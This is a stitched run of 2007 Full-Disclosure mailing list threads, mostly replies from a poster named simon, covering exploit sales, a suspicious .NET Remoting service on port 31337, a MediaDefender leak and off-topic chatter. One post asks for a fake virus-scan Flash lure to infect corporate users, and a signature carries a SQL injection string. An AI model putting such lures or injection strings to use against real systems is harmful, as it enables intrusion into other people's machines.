No worries man, I should have been more clear. Thierry Zoller wrote: Dear Simon, SS Selling exploits to just anyone is irresponsible. Fully agree, I interpreted your intial post as being US centric and based on ethical judgement, hence my comments. No hard feelings =) -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hushmail == Narqz
Paul, This hardly means that the hushmail crew are narqz, it just means that they are cooperating with the law like any legitimate business would. If you don't like that then you shouldn't use any services offered by any legitimate business. Good article. Paul Melson wrote: http://blog.wired.com/27bstroke6/2007/11/encrypted-e-mai.html I thought it seemed a little quiet on fd today. :-) PaulM ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] mac trojan in-the-wild
I beg to differ, a claymore is a bit large... it would have to be something a bit smaller, especially if its a laptop. reepex wrote: I guess you never heard of full disk encryption, finger print readers, or caged machines. On Nov 2, 2007 3:51 PM, Dude VanWinkle [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: On 11/2/07, J. Oquendo [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Dude VanWinkle wrote: A program installed under false pretenses that will give the author/distributer remote access to the victim machines. Right... Guess those local are not a threat. ?? Local to the machine?? all prevention methods fail if physical security is compromised. There is nothing short of hooking a claymore to the inside of your case that will stop someone knowledgeable who has physical access to your machine from doing whatever they want Vranisaprick is that you ? -JP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Flash that simulates virus scan
Heh... not sure what government you're referring to... btw, you going to answer my earlier question or not? reepex wrote: dont you listen to pdp ever? the government uses xss and bruteforces remote desktop logins http://seclists.org/fulldisclosure/2007/Oct/0417.html pdp: military grade exploits? :) dude, I am sorry man.. but you are living in some kind of a dream world. get real, most of the military hacks are as simple as bruteforcing the login prompt.. or trying something as simple as XSS. -- pdp is an hero and a computer security expert and based on his fans from the list he is the greatest researched since lcamtuf. his word = gold On 11/1/07, jf [EMAIL PROTECTED] wrote: must be on one of the .gov red teams ;] On Wed, 31 Oct 2007, reepex wrote: Date: Wed, 31 Oct 2007 16:56:20 -0500 From: reepex [EMAIL PROTECTED] To: Joshua Tagnore [EMAIL PROTECTED], full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Flash that simulates virus scan resulting to se in a pen test cuz you cant break any of the actual machines? lulz On 10/31/07, Joshua Tagnore [EMAIL PROTECTED] wrote: List, Some time ago I remember that someone posted a PoC of a small site that had a really nice looking flash animation that performed a virus scan and after the virus scan was finished, the user was prompted for a Download virus fix? question. After that, of course, a file is sent to the user and he got infected with some malware. Right now I'm performing a penetration test, and I would like to target some of the users of the corporate LAN, so I think this approach is the best in order to penetrate to the LAN. I searched google but failed to find the URL, could someone send it to me ? Thanks! Cheers, -- Joshua Tagnore ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New term RDV is born
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Has anyone ever heard of .NET REMOTING running on port 31337? If so, have you ever seen it legitimate? - -- - - simon - -- http://www.snosoft.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (Darwin) iD8DBQFG/Tmif3Elv1PhzXgRAno6AKClAlOCLAAgz6qQ1kf2wlNrwTJvyQCgnYly pzaLBpxKrk7tqjLSIKr54ZQ= =vmjE -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] .NET REMOTING on port 31337
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Has anyone ever heard of .NET REMOTING running on port 31337? If so, have you ever seen it legitimate? - -- - - simon - -- http://www.snosoft.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (Darwin) iD8DBQFG/Tpqf3Elv1PhzXgRAmOlAKCwOeb3tY1qp8KK/Z4fMYxLOB50nwCcDxCx Io9uFQH7RLDVdo5QDc36+n4= =Nz1q -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] .NET REMOTING on port 31337
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Got output... and it was... no idea what it was... can't paste it due to confidentiality though. Fabrizio wrote: .NET Remoting is a generic system for different applications to use to communicate with one another. It's part of the .NET framework, obviously. (not trying to be a smart ass) I'm gonna take a wild guess and say it's not a good thing.. Connect to it, and see if you get any output, if you haven't already done so. Fabrizio On 9/28/07, * Simon Smith* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Has anyone ever heard of .NET REMOTING running on port 31337? If so, have you ever seen it legitimate? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ - -- - - simon - -- http://www.snosoft.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (Darwin) iD8DBQFG/UY+f3Elv1PhzXgRAs/BAJ42Vwk5+cvWfoYo4wUl74LDnUtz7wCgzW9s O/+SDoZYgZ1r1oDjKpKzZIo= =n54j -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] .NET REMOTING on port 31337
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Right, It set off alarms with all of my penetration testers hence why we're researching it. The question I have is, has anyone seen port 31337 respond with the .NET REMOTING banner? Our nmap -A claims that it is .NET REMOTING... just seems weird... Anyone know of any backdoors that do that? The Security Community wrote: The last time I saw anything on port 31337 (ELEET) it was during a vulnerability assessment. We shut it down and stopped the assessment. Management wouldn't let us investigate, then blew the cover on the assessment a week or two later. It's almost always bad, but you may just have an admin with a stupid sense of humor. 31337 should always throw a red flag. On 9/28/07, Simon Smith [EMAIL PROTECTED] wrote: Has anyone ever heard of .NET REMOTING running on port 31337? If so, have you ever seen it legitimate? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ - -- - - simon - -- http://www.snosoft.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (Darwin) iD8DBQFG/UDef3Elv1PhzXgRAjZZAJ4mwrJ0WyvGBUznwbrRu4+/JBd0owCdHcgr aKOuZul4pgLcu4H3Aoo1HuU= =X1Ya -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] .NET REMOTING on port 31337
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Unfortunately I do not have the control or authority to dig into it further... but your input has been helpful... Fabrizio wrote: If you think it's that critical, (i think it's that critical) start by blocking any connections from anywhere to that machine/port. See if anyone complains. Check any old firewall logs for that port while you're at it. Then continue your investigation!! Fabrizio On 9/28/07, *Simon Smith* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Got output... and it was... no idea what it was... can't paste it due to confidentiality though. Fabrizio wrote: .NET Remoting is a generic system for different applications to use to communicate with one another. It's part of the .NET framework, obviously. (not trying to be a smart ass) I'm gonna take a wild guess and say it's not a good thing.. Connect to it, and see if you get any output, if you haven't already done so. Fabrizio On 9/28/07, * Simon Smith* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] mailto:[EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Has anyone ever heard of .NET REMOTING running on port 31337? If so, have you ever seen it legitimate? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ - -- - - simon - -- http://www.snosoft.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (Darwin) iD8DBQFG/Usqf3Elv1PhzXgRAh5AAJ0RxE4tIngEn8UEEI4zAcegyrwpWgCfV/So VujlHHNApdBkb4oyl9n698I= =Xp4i -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] .NET REMOTING on port 31337
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 No way... are you serious? ;P [EMAIL PROTECTED] wrote: Sounds like you will need to learn how to use debugging and other reverse engineering tools dude. Security gets a little more complicated post-nmap. On Fri, 28 Sep 2007 14:21:52 -0400 Simon Smith [EMAIL PROTECTED] wrote: Got output... and it was... no idea what it was... can't paste it due to confidentiality though. Fabrizio wrote: .NET Remoting is a generic system for different applications to use to communicate with one another. It's part of the .NET framework, obviously. (not trying to be a smart ass) I'm gonna take a wild guess and say it's not a good thing.. Connect to it, and see if you get any output, if you haven't already done so. Fabrizio On 9/28/07, * Simon Smith* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Has anyone ever heard of .NET REMOTING running on port 31337? If so, have you ever seen it legitimate? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ - --- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com - -- Click here to find great prices on contact lenses. Save now. http://tagline.hushmail.com/fc/Ioyw6h4ea3DsXjSV0BsP1YTozy3Px8JSHxZEv9UYiKIbvmBMS8cN5D/ - -- - - simon - -- http://www.snosoft.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (Darwin) iD8DBQFG/U9rf3Elv1PhzXgRAiyFAKDJyReKwVwrkg5AcY/wH3Zm7NLu+QCfRpbP XKz5miZjpHyUPRHs7C0XodM= =yNlk -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] .NET REMOTING on port 31337
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I do... but I don't have time to explain it to you... its complicated... post-nmap stuff... [EMAIL PROTECTED] wrote: dunno how do you plan on figuring out what is running there On Fri, 28 Sep 2007 15:07:34 -0400 Simon Smith [EMAIL PROTECTED] wrote: Phew... thought you were serious for a moment... I mean... what more could there be aside from nmap. ;] [EMAIL PROTECTED] wrote: No just kidding lol a lot of people here seem to make money in this business. On Fri, 28 Sep 2007 15:01:01 -0400 Simon Smith [EMAIL PROTECTED] wrote: No way... are you serious? ;P [EMAIL PROTECTED] wrote: Sounds like you will need to learn how to use debugging and other reverse engineering tools dude. Security gets a little more complicated post-nmap. On Fri, 28 Sep 2007 14:21:52 -0400 Simon Smith [EMAIL PROTECTED] wrote: Got output... and it was... no idea what it was... can't paste it due to confidentiality though. Fabrizio wrote: .NET Remoting is a generic system for different applications to use to communicate with one another. It's part of the .NET framework, obviously. (not trying to be a smart ass) I'm gonna take a wild guess and say it's not a good thing.. Connect to it, and see if you get any output, if you haven't already done so. Fabrizio On 9/28/07, * Simon Smith* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Has anyone ever heard of .NET REMOTING running on port 31337? If so, have you ever seen it legitimate? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure- charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ - -- -- --- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure- charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com -- Click here to find great prices on contact lenses. Save now. http://tagline.hushmail.com/fc/Ioyw6h4ea3DsXjSV0BsP1YTozy3Px8JSHxZE v9UYiKIbvmBMS8cN5D/ -- - simon -- http://www.snosoft.com -- Click here for free information on exciting leadership programs. http://tagline.hushmail.com/fc/Ioyw6h4dDEsHl9DycYqbZ3GrueBGQ2n3jOJL u8VBwDe3bXvscFUYtv/ -- - simon -- http://www.snosoft.com - -- Click for free information on accounting careers, $150 hour potential. http://tagline.hushmail.com/fc/Ioyw6h4dCaQzqlFuxiHhBM76jQM7p3uFLDVTjtv7Yywb9ixgu0UUOR/ - -- - - simon - -- http://www.snosoft.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (Darwin) iD8DBQFG/VRrf3Elv1PhzXgRAqasAJ4hRG9k8czQWxQMphFx1636mOO5lQCcCJbe lofey5C2ByC3oVNwChEM//o= =viJl -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] .NET REMOTING on port 31337
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Phew... thought you were serious for a moment... I mean... what more could there be aside from nmap. ;] [EMAIL PROTECTED] wrote: No just kidding lol a lot of people here seem to make money in this business. On Fri, 28 Sep 2007 15:01:01 -0400 Simon Smith [EMAIL PROTECTED] wrote: No way... are you serious? ;P [EMAIL PROTECTED] wrote: Sounds like you will need to learn how to use debugging and other reverse engineering tools dude. Security gets a little more complicated post-nmap. On Fri, 28 Sep 2007 14:21:52 -0400 Simon Smith [EMAIL PROTECTED] wrote: Got output... and it was... no idea what it was... can't paste it due to confidentiality though. Fabrizio wrote: .NET Remoting is a generic system for different applications to use to communicate with one another. It's part of the .NET framework, obviously. (not trying to be a smart ass) I'm gonna take a wild guess and say it's not a good thing.. Connect to it, and see if you get any output, if you haven't already done so. Fabrizio On 9/28/07, * Simon Smith* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Has anyone ever heard of .NET REMOTING running on port 31337? If so, have you ever seen it legitimate? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ --- -- --- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com -- Click here to find great prices on contact lenses. Save now. http://tagline.hushmail.com/fc/Ioyw6h4ea3DsXjSV0BsP1YTozy3Px8JSHxZE v9UYiKIbvmBMS8cN5D/ -- - simon -- http://www.snosoft.com - -- Click here for free information on exciting leadership programs. http://tagline.hushmail.com/fc/Ioyw6h4dDEsHl9DycYqbZ3GrueBGQ2n3jOJLu8VBwDe3bXvscFUYtv/ - -- - - simon - -- http://www.snosoft.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (Darwin) iD8DBQFG/VD0f3Elv1PhzXgRAjBUAKC/7NFISUGAzV22LHAbMjx/82mCogCgo0No 8yUsbCYwx28JimfrRqEPSDs= =CYSJ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] .NET REMOTING on port 31337
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Sorry, Bad Troll... no more food... [EMAIL PROTECTED] wrote: fascinating tell me more On Fri, 28 Sep 2007 15:36:07 -0400 Simon Smith [EMAIL PROTECTED] wrote: I don't have any techniques... [EMAIL PROTECTED] wrote: educate me dude i bet i'll win this one. are your techniques more advanced than the anvil ids suite? On Fri, 28 Sep 2007 15:22:23 -0400 Simon Smith [EMAIL PROTECTED] wrote: I do... but I don't have time to explain it to you... its complicated... post-nmap stuff... [EMAIL PROTECTED] wrote: dunno how do you plan on figuring out what is running there On Fri, 28 Sep 2007 15:07:34 -0400 Simon Smith [EMAIL PROTECTED] wrote: Phew... thought you were serious for a moment... I mean... what more could there be aside from nmap. ;] [EMAIL PROTECTED] wrote: No just kidding lol a lot of people here seem to make money in this business. On Fri, 28 Sep 2007 15:01:01 -0400 Simon Smith [EMAIL PROTECTED] wrote: No way... are you serious? ;P [EMAIL PROTECTED] wrote: Sounds like you will need to learn how to use debugging and other reverse engineering tools dude. Security gets a little more complicated post-nmap. On Fri, 28 Sep 2007 14:21:52 -0400 Simon Smith [EMAIL PROTECTED] wrote: Got output... and it was... no idea what it was... can't paste it due to confidentiality though. Fabrizio wrote: .NET Remoting is a generic system for different applications to use to communicate with one another. It's part of the .NET framework, obviously. (not trying to be a smart ass) I'm gonna take a wild guess and say it's not a good thing.. Connect to it, and see if you get any output, if you haven't already done so. Fabrizio On 9/28/07, * Simon Smith* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Has anyone ever heard of .NET REMOTING running on port 31337? If so, have you ever seen it legitimate? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure- charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ - -- -- -- -- --- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure- charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com -- Click here to find great prices on contact lenses. Save now. http://tagline.hushmail.com/fc/Ioyw6h4ea3DsXjSV0BsP1YTozy3Px8JSHxZE v9UYiKIbvmBMS8cN5D/ -- - simon -- http://www.snosoft.com -- Click here for free information on exciting leadership programs. http://tagline.hushmail.com/fc/Ioyw6h4dDEsHl9DycYqbZ3GrueBGQ2n3jOJL u8VBwDe3bXvscFUYtv/ -- - simon -- http://www.snosoft.com -- Click for free information on accounting careers, $150 hour potential. http://tagline.hushmail.com/fc/Ioyw6h4dCaQzqlFuxiHhBM76jQM7p3uFLDVT jtv7Yywb9ixgu0UUOR/ -- - simon -- http://www.snosoft.com -- - simon -- http://www.snosoft.com - -- Click here to double your salary by becoming a medical transcriber. http://tagline.hushmail.com/fc/Ioyw6h4eKoYonp8l5phlPjo68YSllQcgUuXLY6l8zog39ob29d9DHf/ - -- - - simon - -- http://www.snosoft.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (Darwin) iD8DBQFG/Vipf3Elv1PhzXgRAkKaAJ9/bq1leS7bLVQHlimU0uqLCSFz6ACgkLH3 W2A/pIOc4WGgTBH7vftDbEY= =XGWo -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Dailydave] Hacking software is lame -- try medical research...
Just like technology research (hacking)... but... if you are the one that finds a cure, you'll make your buck too. M. Shirk wrote: There is more money to be made in the treatment of a disease, then actually finding a cure. Remind you of anything? Shirkdog ' or 1=1-- http://www.shirkdog.us Date: Fri, 21 Sep 2007 10:37:20 -0700 From: [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED] Subject: [Dailydave] Hacking software is lame -- try medical research... Some interesting discussion came up on some security lists this week and it got me to thinking. Yes, hacking software is lame. Cool, so you found some vulnerabilities in some widely distributed application, service, or OS and it is patched just as quickly. Why don't we spend our time and valuable energy researching cures for rare or popular diseases instead? For instance, my brother (Jon Hermansen) has a very rare disease called Langerhans Cell Histiocytosis. It is also better known as LCH. It can be identified as causing such further diseases as Diabetes Insipidus, which is also uncommon (not sugar diabetes). Have you heard of these diseases before? Let me educate you… General Information: http://en.wikipedia.org/wiki/Langerhans_cell_histiocytosis http://en.wikipedia.org/wiki/Diabetes_insipidus Seven Part Video Series: http://youtube.com/watch?v=KkBRqZS8nfM http://youtube.com/watch?v=w1h6ZjxF-To http://youtube.com/watch?v=0ojbJpERlt8 http://youtube.com/watch?v=dzUqdYofMCQ http://youtube.com/watch?v=lNhzwNYhi0M http://youtube.com/watch?v=nY9DDEhShcE http://youtube.com/watch?v=5_8SEYyEZGI And even worse than this, a friend of mine who is a PhD student in Math at Berkeley has an even rarer disease known as Gaucher's Disease. This costs $550,000 / year to treat. That's a hefty bill every year (you make that much doing security vulns?), and some insurance companies might refuse to accept you due to pre-existing conditions. So guess what, my friend does not have health insurance and has not been treated for two years. A genius might die. That's ludicrous. http://en.wikipedia.org/wiki/Gaucher's_disease http://youtube.com/watch?v=0nX6QM5iVaU If we consider ourselves decent hackers, why don't we put our efforts toward helping cure this and other diseases rather than some very simple programming vulnerability? Is it because then we would have to reinvent a whole new slew of tools and re-orient/re-educate ourselves to be successful? Think about it… -- Kristian Erik Hermansen ___ Dailydave mailing list [EMAIL PROTECTED] http://lists.immunitysec.com/mailman/listinfo/dailydave More photos; more messages; more whatever – Get MORE with Windows Live™ Hotmail®. NOW with 5GB storage. Get more! http://imagine-windowslive.com/hotmail/?locale=en-usocid=TXT_TAGHM_migration_HM_mini_5G_0907 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Media Defender pwned big time
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 This was originally reported to Daily Dave by [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: After the email leak[1], a phone call was leaked[2], allegedly between Ben Grodsky of Media Defender and New York State General Attorney. here is a teaser transcript: Ben Grodsky: Yeah it seems...I mean, from our telephone call yesterday it seems that uhm... we all pretty much came to the conclusion that probably was ehm... caught in the email transmission because the attacker, I guess what you call, the Swedish IP, the attacker uhm... knew the login and the IP address and port uhm... but they weren't able to get in because we had changed the password on our end, you know, following our normal security protocols uhm... when we are making secure transactions like these on the first login we'll change the password so, obviously, well not obviously but, it seems that, most likely scenario is that, at some point that email was ehm... intercepted. You know just because it is,.. probably it was going through the public Internet and there wasn't any sort of encryption key used to ehm... protect the data in that email. Ben Grodsky: ...if you guys are comfortable just communicating with us by phone, anything that is really really sensitive we can just communicate in this fashion... Ben Grodsky: OK [confused, taking notes]. So, you are gonna disable password authentication and enable public key? Ben Grodsky: ...that part has... has not been compromised in any way. I mean, the communications between our offices in Santa Monica and our data centers have not been compromised in any way and all those communications to NY, to your offices, are secured. The only part that was compromised was...was the email communications about these things. Ben Grodsky: ...All we can say for sure Media Defender's mail server has not been hacked or compromised... [in answer to the question What kind of IDS you guys are running?] Ben Grodsky: Ehm...I don't know. Let me look into that. [1] http://torrentfreak.com/mediadefender-emails-leaked-070915/ [2] http://thepiratebay.org/tor/3809004/MediaDefender.Phonecall-MDD -- Orlando Vacations - Click Here! http://tagline.hushmail.com/fc/Ioyw6h4eQYIUh5GP6TXBJkrbGXtVy6e3wl8YMoCtnDIhNerwr43Wv2/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ - -- - - simon - -- http://www.snosoft.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (Darwin) iD8DBQFG7/Tjf3Elv1PhzXgRAtrQAKDMH3IrVmuu+A7vOB2fHDO/gYrfdwCfSDbQ 2b9dYRSE+Q8TqXYcpspgNY4= =ma9i -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Symantec Contact?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I haven't been following this thread, but what about submitting the details to them in the same way that you'd submit a vulnerability. I'd find it hard to believe that they'd just ignore it. Morning Wood wrote: What's really Sad is that Symantec does not have an option for the general public (i.e. Independent Virus Researchers) to submit virus samples . You have to either A. Submit it through their product. B. Have a Corporate Support contract. Guess they don't want new samples. agree 100%, stupidity ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ - -- - - simon - -- http://www.snosoft.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (Darwin) iD8DBQFG8ABIf3Elv1PhzXgRAhq0AKCb/kwPy17BJQ1sMtPxS8ORPXQS6QCgyw32 JyyH5s8kDS5Os7NYaZbsgzg= =yRLg -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unreal: a movement to block Firefox
Just spoof your userAgent...
?
$userAgent=strtolower($_SERVER['HTTP_USER_AGENT']);
if(strstr($userAgent, 'firefox'))
{
header(Location: http://whyfirefoxisblocked.com;);
exit();
}
?
mbs wrote:
The whole concept of blocking 12.41% of Internet users (see
http://en.wikipedia.org/wiki/Usage_share_of_web_browsers ) seems
laughable, and a bad idea.
What I don't find amusing is Chris Soghoian's statement Users of
advertisement skipping technology are essentially engaged in theft of
resources.
I don't know about anyone else, but I happen to pay for my internet
access. If I choose not to waste my bandwidth (and my time) with
unwanted content, I would suggest that is my right.
Micheal Espinola Jr wrote:
http://whyfirefoxisblocked.com/
http://www.cnet.com/8301-13739_1-9770502-46.html?part=rsssubj=newstag=2547-1_3-0-5
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
- simon
--
http://www.snosoft.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] What do you guys make of this?
So, whats up with Russia these days? I'm hearing more and more about Russia on the news. Is this just propaganda or is something really going on? http://news.bbc.co.uk/2/hi/uk_news/6957589.stm - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] What do you guys make of this?
I agree with what you said for the most part. I also know that most Russian people are very happy with what Putin is doing. Thus far, in their eyes, he's one of the best leaders that they've had in ages. Do you think that Russia is actually going to become a threat again? Do you think this will go back to the cold-war like times? Joel R. Helgeson wrote: There was a time in foreign policy where no country, no diplomat would make a foreign policy decision without first asking what does Russia think of this?. Well, Russia is no longer a super power, the fall from which left Putin feeling excluded. He's always wanted to get Russia back to superpower status, he wants his Mother Russia to be significant again. For years, the Russian economy was cash strapped. Just recently Putin revamped the entire tax system and implemented a 12% flat tax. For the first time since the collapse, the tax revenues are POURING in. They now have enough gas to fuel a plane, and now they want to get back into being viewed as a superpower, to be 'feared', they desperately want to matter again, to be important. So, they're acting out in an aggressive manner - using tried and true cold war era tactics. It comes across to me as childish, throwing a fit just to get attention. It is not propaganda, Russia is just trying to say We're BAACK! And this time, we've got 31337 H4x0rz! Joel Helgeson 952-858-9111 -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Simon Smith Sent: Thursday, September 06, 2007 11:47 AM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] What do you guys make of this? So, whats up with Russia these days? I'm hearing more and more about Russia on the news. Is this just propaganda or is something really going on? http://news.bbc.co.uk/2/hi/uk_news/6957589.stm - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n.runs-SA-2007.027 - Sophos Antivirus UPX parsing Arbitrary CodeExecution Advisory
